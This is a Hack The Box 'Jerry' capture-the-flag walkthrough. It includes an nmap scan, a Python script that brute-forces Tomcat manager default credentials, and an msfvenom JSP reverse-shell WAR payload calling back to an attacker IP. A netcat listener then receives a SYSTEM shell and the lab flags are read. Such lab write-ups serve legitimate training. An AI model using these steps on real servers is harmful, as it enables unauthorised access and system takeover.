htb-jerry-nl

Today we are going to solve another CTF challenge “Jerry” which is available online for those who want to increase their skill in penetration testing. Jerry is retried vulnerable lab presented by Hack the Box.

Level: Easy

Task: find user.txt and root.txt file on victim’s machine.

Let’s begin with nmap port enumeration.

root@kali:~/htb/jerry# nmap -sV -sC -oA nmap 10.10.10.95
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-27 09:15 EDT
Nmap scan report for 10.10.10.95
Host is up (0.026s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.65 seconds

I then decided to access the Tomcat webpage at the URL: http://10.10.10.95:8080 From here, I decided to take to Google, to try and find documentation on the administration portal in Tomcat.

Picture

After Googling for some time, I learn that Tomcat does not call it’s Administrator’s admins, but instead  calls them managers. I also realize that I can access the portal through the link:http://10.10.10.95:8080/manager/html

Picture


Is it worth trying to login with default or common credentials, and @danielmiessler’s SecLists contains a comprehensive list of Tomcat credentials.
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Default-Credentials /tomcat-betterdefaultpasslist.txt
As this list contains 79 credentials it is worth scripting some automation
The script “tomcat-brute.py”is used.
root@kali:~/htb/jerry# cat tomcat-brute.py 
# author: @egre55
# script to automate the testing of common apache tomcat credentials
#!/usr/bin/env python

import sys
import requests

with open('tomcat-betterdefaultpasslist.txt') as f:
for line in f:
c = line.strip('\n').split(":")
r = requests.get('http://10.10.10.95:8080/manager/html', auth=(c[0], c[1]))

sys.stdout.write("\033[K")
sys.stdout.write(line.strip('\n') + '\r')
sys.stdout.flush()

if r.status_code == 200:
print "Found valid credentials \"" + line.strip('\n') + "\""
raise sys.exit()
root@kali:~/htb/jerry# python tomcat-brute.py 
Found valid credentials "tomcat:s3cret"
Now  I can log into the manager’s portal and see the following screen.

Picture

I soon begin to realize that all of the file formats are in *.war and that I can only upload *.war file types. So after doing some research, I realize that I can create payloads using metasploit! I create a *.war payload using the command:
root@kali:~/htb/jerry# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.20 LPORT=443 -f war > shell.war
Payload size: 1102 bytes
Final size of war file: 1102 bytes
Next, I extract the shell.war file so that I can examine the jsp_shell file name for future use:
root@kali:~/htb/jerry# jar -xvf shell.war
created: WEB-INF/
inflated: WEB-INF/web.xml
inflated: wxiucdkyhxeetnn.jsp
Picture
​I then uploaded the file and clicked to start the service. After, I start a netcat session by using the command: # nc -nvlp 443
to start listening for any services that want to connect, So I can gain a reverse shell.
I then go back to the website and type into the URL:
http://10.10.10.95:8080/shell/wxiucdkyhxeetnn.jsp
Please remember that the *.jsp file is the file name that was extracted earlier from the shell.war file.
c:\Users\jacco>nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88> cd C:\Users\Administrator\Desktop\flags

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
700*****d00

root.txt
04a*****90e
​Author : Puckiestyle
Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *